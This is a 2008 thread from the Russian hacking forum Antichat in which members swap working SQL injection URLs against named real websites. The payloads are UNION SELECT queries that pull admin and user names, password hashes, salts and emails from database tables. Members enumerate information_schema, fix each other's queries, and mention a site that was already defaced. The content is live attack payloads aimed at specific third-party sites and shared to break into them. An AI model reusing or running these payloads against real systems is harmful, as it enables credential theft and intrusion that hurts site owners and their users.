Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.06.2008, 22:41
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
эта тема для скулей. тебе сюда http://forum.antichat.ru/showthread.php?p=585987 пост #2464.
|
|
|
10.06.2008, 10:15
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Код:
http://www.donny.co.uk/rovers/news.php?ID=-57+union+select+1,admin_id,3,4,5,6,admin_email,admin_pass,9,10,11+from+zenadmin/*
В information_schema.tables подглядел еще таблицы:
forums2_acl_users
phplist_rssitem_user
phplist_user_user
ttrss_users
Чтоб просмотреть их колонки надо будет зашифровать в hex.(Спасибо тохе  )
Код:
http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password,user_email,10+from+phpbb_users+limit+1,1/*
Последний раз редактировалось SUBJECT617; 10.06.2008 в 10:46..
Причина: yables...
|
|
|
|
10.06.2008, 15:38
|
|
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686
Репутация:
531
|
|
Сообщение от SUBJECT617
http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password ,user_email,10+from+phpbb_users+limit+1,1/*
Hacked by [WSWW] teAm
cупер хекеры мля =\ умно смотреть ачат а потом дефить
|
|
|
|
10.06.2008, 17:07
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
NFM, SUBJECT617,
вот верная таблица форума:
http://www.parkui.ru/news.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,user_password),9,10+from+park_phpbb_users+limi t+1,1/*
Последний раз редактировалось sabe; 10.06.2008 в 17:15..
|
|
|
|
10.06.2008, 18:15
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
171038
Репутация:
11
|
|
http://untp.kiev.ua/test.php?id=1%20UNION%20ALL%20SELECT%201,2,databas e(),4,psevdo,6%20from%20pages%20%20/*
MySQL 4.0.27 
но таблицу подобрал только одну да и то вряд ли полезную (да и колонки впадло подбирать)
http://untp.kiev.ua/adminka/
знать бы еще куда она смотрит
там же есть IPB, но его таблицы тоже не нашел
|
|
|
|
10.06.2008, 20:24
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от theli
там же есть IPB, но его таблицы тоже не нашел
там несложно догадаться
email+name
://untp.kiev.ua/test.php?id=1%20union%20 select%201,2,concat_ws(0x3a,email,name),4,5,6+from +untp.ibf_members
hash+salt
://untp.kiev.ua/test.php?id=1%20 union%20select%201,2,concat_ws(0x3a,converge_pass_ hash,converge_pass_salt),4,5,6+from+untp.ibf_membe rs_converge
|
|
|
|
10.06.2008, 20:58
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
в антибояне нет
www.pchelenok.ru
Уязвимость в скрипте который отображает товары:
Код:
http://www.pchelenok.ru/index.php?action=show_item&parent=1'
Просмотр информации:
Код:
http://www.pchelenok.ru/index.php?action=show_item&parent=-00032308+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
Информация о базе:
Код:
4.1.22
pchelenok_mysql@10.1.46.118
pchelenok_db
|
|
|
|
10.06.2008, 21:39
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Я канешн понимаю что недохек, но таблицы хоть немного похожей на таблицу юзверей я не нашел, да БД мне заявила что таблицы parol не существует, хотя как видно из урла ниже она там есть.
Код:
http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,table_name,6+from+information_schema.tables/*
А вот и колонки таблицы парол
Код:
http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,column_name,6+from+information_schema.columns+where+table_name=0x7061726f6c/*
Мож вы разберетесь...  |
|
|
|
10.06.2008, 22:42
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
Ув. тов. SUBJECT617, все очень просто: БД, с которой работает скрипт называется "mitsubis_auto", а таблица parol в БД "test". Правильный запрос будет:
Код:
http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,unhex(hex(passvord)),6+from+test.parol/*
Вы не учитываете поле таблицы INFORMATION_SCHEMA.TABLES table_schema. |
|
|
|
10.06.2008, 22:42
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
нету таблицы parol изза того что не из той базы просиш.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
